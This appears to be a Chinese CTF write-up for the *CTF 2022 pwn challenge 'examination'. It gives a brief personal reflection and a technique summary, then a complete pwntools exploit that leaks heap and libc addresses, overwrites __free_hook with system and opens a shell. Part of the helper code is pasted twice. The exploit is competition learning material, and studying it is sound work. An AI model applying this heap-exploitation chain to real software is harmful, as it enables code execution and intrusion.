[原创]【*ctf2022】examination
发表于: 2022-4-28 19:00 8652
何谓成长?成长就是当你还未成熟的时候脑海中复现的担当。学pwn已经半年多了,总不能还称自己是新手了吧
从之前栈题都不大会,遇到堆题基本放弃,从见了musl、go、arm就躲到现在终于主动去学习相关的知识,这就是成长。成长不仅仅意味着能力的提升,还意味着心灵的成熟,对学习的态度的变化。
最后,引用最近的脑海中一直复现的鼬神的一句话:
“你并不弱,只是缺乏信念”
通过整型溢出,在note段向上伪造结构体实现任意地址写,修改一个chunk的size,free它放入unsortedbin leak libc,再通过任意地址写修改free_hook为system,然后free('/bin/sh')实现shell的get
有些绕过的细节其实调调就能出
这题让我认识到了自己shit一样的逆向
逆不动的时候,可以放gdb里调调,拿张草稿纸画画,或者在旁边注一下自己好理解的形式,比如:
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
# pwntools global settings: verbose tube logging, x86-64 Linux target.
##context.terminal = ["tmux", "splitw", "-h"]
context.update(log_level='debug', arch='amd64', os='linux')
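def proof_of_work(sh):
    """Solve the server's sha256 proof-of-work on tube *sh*.

    Reads the target digest that follows " == ", brute-forces a 4-character
    alphanumeric preimage with mbruteforce, and sends it at the
    "input your ????>" prompt.  Only needed for the remote instance (see the
    commented-out remote()/proof_of_work() lines below this function).
    """
    # `string` is never imported at file level; the explicit local import
    # keeps this helper working whether or not `from pwn import *` happens
    # to re-export it.
    import string

    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    alphabet = string.ascii_letters + string.digits
    proof = mbruteforce(
        lambda x: sha256((x).encode()).hexdigest() == cipher,
        alphabet,
        length=4,
        method='fixed',
    )
    sh.sendlineafter("input your ????>", proof)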
##r = remote("chuj.top", 51904)
##proof_of_work(r)
# Challenge artifacts: the provided libc (for symbol offsets) and a local
# instance of the binary under test.
libc, r = ELF('./libc-2.31.so'), process('./examination')
def z():
    """Debug helper: attach gdb to the running target tube *r*."""
    gdb.attach(r)
def cho(num):
    """Answer the "choice>> " menu prompt with *num*.

    Uses sendafter, so no newline follows the choice (as in the original).
    """
    choice = str(num)
    r.sendafter("choice>> ", choice)
def t_add(num):
    """Menu option 1: add *num* questions (t_ prefix: used in the teacher role)."""
    cho(1)
    count = str(num)
    r.sendlineafter('enter the number of questions: ', count)
def t_view(idx, cont, size):
    """Menu option 3: view entry *idx* and write comment *cont* into it.

    After sending the index, everything up to 'comment:' is read.  When that
    data is exactly "enter your comment:" (nothing received before the
    prompt), *cont* is sent directly; otherwise *size* is sent first and
    *cont* follows at the "enter your comment:" prompt.

    NOTE(review): the equality compares the tube's received data with a str
    literal.  The '\x00' ljust fill used later in the script suggests it was
    written for Python 2, where this works; under Python 3 recvuntil()
    returns bytes, the comparison is always False and only the else branch
    runs.  Confirm against the interpreter actually used.
    """
    ##first_view
    cho(3)
    r.sendlineafter("which one? > ", str(idx))
    bool_ = r.recvuntil('comment:')
    if bool_ == "enter your comment:":
        r.send(cont)
    else:
        r.sendline(str(size))
        r.sendafter("enter your comment:", cont)
def t_delet(idx):
    """Menu option 4: delete the entry for student id *idx*.

    The id is sent with sendafter, i.e. without a trailing newline, exactly
    as the original helper did.
    """
    cho(4)
    student = str(idx)
    r.sendafter("which student id to choose?", student)
def t_role(num):
    """Menu option 5: switch role; 0 selects teacher, 1 selects student."""
    cho(5)
    role = str(num)
    r.sendlineafter("role: <0.teacher/1.student>: ", role)
def s_changeid(idx):
    """Menu option 6: set the current student id to *idx* (s_ prefix: student role)."""
    cho(6)
    new_id = str(idx)
    r.sendlineafter("input your id: ", new_id)
# Exploit flow against the local ./examination instance with the provided
# libc-2.31.so.  Every constant below (0x2a0, 0x200, 0x968, 0x338, 0x340,
# 0x621, 0x1ecbe0) was presumably taken from the author's debugging session
# on this exact build; they are not expected to hold for a different binary
# or libc.  The script's '\x7f' / '\x00' str arguments to ljust suggest it was
# run under Python 2 -- under Python 3 bytes.ljust() rejects a str fill.

##pre
# Start as teacher, create two questions (#0 and #1) and give each a comment.
r.sendlineafter("role: <0.teacher/1.student>: ", str(0))
t_add(1)  #0
t_add(1)  #1
t_view(0, hex(0xdeadbeef), 0x300)
t_view(1, hex(0xdeadbeef), 0x300)
t_role(1)
cho(3)
t_role(0)
cho(2)

##leak_heap
# The student-side option 2 prints an address after "Good Job! ...";
# subtracting 0x2a0 turns it into the heap base.
t_role(1)
cho(2)
r.recvuntil("Good Job! Here is your reward! ")
heap = int(r.recvuntil('\n', drop=True), base=16) - 0x2a0
log.success('heap:' + hex(heap))
# The '00' prefix is kept verbatim from the original; its purpose is not
# visible here -- presumably a quirk of how the program parses the address.
r.sendlineafter("add 1 to wherever you want! addr: ", '00' + str(heap + 0x200))

##make_fake_struct
# Negative ids (-15, -13 below) reach outside the note array; the 3-qword
# payload is the forged structure the author describes, with its last
# field pointing at the chunk whose size is rewritten next.
s_changeid(-15)
cho(4)
pd = p64(heap + 0x968) + p64(0xdeadbeef) + p64(heap + 0x338)
r.sendlineafter("enter your mode!", pd)

##change chunck(0x55555555f330) size 311 to 621
t_role(0)
t_view(-13, p64(0x621), 0x300)

##free_2_trew_in_unsortedbin
# Freeing the enlarged chunk places it in the unsorted bin.
t_delet(0)

##change struct 2 leak libc
# Re-point the forged structure at the freed chunk's fd (offset 0x340) and
# read it back through option 2; 0x1ecbe0 is the main_arena offset in this
# libc build.
t_role(1)
s_changeid(-15)
cho(4)
pd = p64(heap + 0x968) + p64(0xdeadbeef) + p64(heap + 0x340)
r.sendlineafter("enter your mode!", pd)
s_changeid(-13)
cho(2)
r.recvuntil("here is the review:\n")
libcbase = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 0x1ecbe0
log.success('libcbase:' + hex(libcbase))

##set_libc_fuc
free_hook = libcbase + libc.sym['__free_hook']
system = libcbase + libc.sym['system']
log.success('free_hook:' + hex(free_hook))
log.success('system:' + hex(system))

##change_free_hook
# Same forged-structure write, now targeting __free_hook.
s_changeid(-15)
cho(4)
pd = p64(heap + 0x968) + p64(0xdeadbeef) + p64(free_hook)
r.sendlineafter("enter your mode!", pd)
t_role(0)
t_view(-13, p64(system), 0x300)

##get_shell
# A fresh comment holding "/bin/sh" is freed, which now calls system().
t_add(1)
t_view(1, '/bin/sh\x00', 0x300)
t_delet(1)
r.interactive()
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
# pwntools global settings: verbose tube logging, x86-64 Linux target.
##context.terminal = ["tmux", "splitw", "-h"]
context.update(log_level='debug', arch='amd64', os='linux')
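def proof_of_work(sh):
    """Solve the server's sha256 proof-of-work on tube *sh*.

    Reads the target digest that follows " == ", brute-forces a 4-character
    alphanumeric preimage with mbruteforce, and sends it at the
    "input your ????>" prompt.  Only needed for the remote instance (see the
    commented-out remote()/proof_of_work() lines below this function).
    """
    # `string` is never imported at file level; the explicit local import
    # keeps this helper working whether or not `from pwn import *` happens
    # to re-export it.
    import string

    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    alphabet = string.ascii_letters + string.digits
    proof = mbruteforce(
        lambda x: sha256((x).encode()).hexdigest() == cipher,
        alphabet,
        length=4,
        method='fixed',
    )
    sh.sendlineafter("input your ????>", proof)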
##r = remote("chuj.top", 51904)
##proof_of_work(r)
# Challenge artifacts: the provided libc (for symbol offsets) and a local
# instance of the binary under test.
libc, r = ELF('./libc-2.31.so'), process('./examination')
def z():
    """Debug helper: attach gdb to the running target tube *r*."""
    gdb.attach(r)
def cho(num):
    """Answer the "choice>> " menu prompt with *num*.

    Uses sendafter, so no newline follows the choice (as in the original).
    """
    choice = str(num)
    r.sendafter("choice>> ", choice)
def t_add(num):
    """Menu option 1: add *num* questions (t_ prefix: used in the teacher role)."""
    cho(1)
    count = str(num)
    r.sendlineafter('enter the number of questions: ', count)
def t_view(idx, cont, size):
    """Menu option 3: view entry *idx* and write comment *cont* into it.

    After sending the index, everything up to 'comment:' is read.  When that
    data is exactly "enter your comment:" (nothing received before the
    prompt), *cont* is sent directly; otherwise *size* is sent first and
    *cont* follows at the "enter your comment:" prompt.

    NOTE(review): the equality compares the tube's received data with a str
    literal.  The '\x00' ljust fill used in the full script suggests it was
    written for Python 2, where this works; under Python 3 recvuntil()
    returns bytes, the comparison is always False and only the else branch
    runs.  Confirm against the interpreter actually used.
    """
    ##first_view
    cho(3)
    r.sendlineafter("which one? > ", str(idx))
    bool_ = r.recvuntil('comment:')
    if bool_ == "enter your comment:":
        r.send(cont)
    else:
        r.sendline(str(size))
        r.sendafter("enter your comment:", cont)
def t_delet(idx):
    """Menu option 4: delete the entry for student id *idx*.

    The id is sent with sendafter, i.e. without a trailing newline, exactly
    as the original helper did.
    """
    cho(4)
    student = str(idx)
    r.sendafter("which student id to choose?", student)
def t_role(num):
    """Menu option 5: switch role; 0 selects teacher, 1 selects student."""
    cho(5)
    role = str(num)
    r.sendlineafter("role: <0.teacher/1.student>: ", role)